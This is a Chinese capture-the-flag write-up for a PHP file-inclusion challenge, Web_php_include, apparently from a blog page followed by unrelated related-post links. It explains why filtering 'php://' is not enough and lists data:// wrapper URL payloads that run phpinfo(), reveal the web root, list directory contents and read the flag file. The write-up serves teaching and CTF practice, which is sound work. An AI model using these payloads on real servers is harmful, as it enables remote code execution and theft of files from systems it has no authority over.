32.攻防世界Web_php_include

进入场景

echo $_GET'hello' 直接将用户通过 GET 方法提交的 hello 参数值输出到页面上,这可能会导致 XSS(跨站脚本攻击)漏洞。

在下面的代码中,虽然对 page 中的 php:// 进行了替换处理,但是仍然存在文件包含漏洞的风险。如果我们能够通过 _GET'page' 传入一个恶意的文件路径,就可能导致服务器上的任意文件被包含和执行

"file://"是一种用于指定本地文件系统中文件的URI(统一资源标识符)协议。通过"file://"协议,可以在浏览器或其他支持该协议的应用程序中访问本地文件

"data://"协议是 PHP 中的一种数据流协议,它允许将数据作为文件来读取。该协议的语法如下:data:(<mediatype>)(;base64),<data>,其中,<mediatype>是可选的媒体类型,<data>是数据内容。

测试

/?page=data://text/plain,<?php phpinfo()?>

目录路径

/?page=data://text/plain,<?php echo $_SERVER'DOCUMENT_ROOT'; ?>

目录文件

/?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>

读取文件内容

/?page=data://text/plain,<?php a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars(a); ?>

相关推荐
心中有国也有家36 分钟前
E-Brufen 技术选型全景:Flutter + 鸿蒙 + Hive CE
hive·hadoop·学习·flutter·华为·harmonyos
New农民工1 小时前
射频芯片学习-ExpressLRS 对频流程分析
学习
Tom@敲代码2 小时前
js学习笔记-01
javascript·笔记·学习
Hiyajo pray2 小时前
属性sdn隐私保护分析
网络安全
辞旧 lekkk2 小时前
【Qt】 系统相关:事件与定时器
开发语言·qt·学习·萌新
zzzll11112 小时前
如何学习AI Agent?
java·人工智能·学习·程序员·大模型
志栋智能3 小时前
超自动化安全如何优化安全运营成本?
人工智能·安全·自动化
默默敲代码的徐哥儿3 小时前
八股文整理——后端
java·开发语言·spring boot·后端·学习
巴巴媛6663 小时前
STM32学习笔记【32.BKP + RTC】
笔记·stm32·学习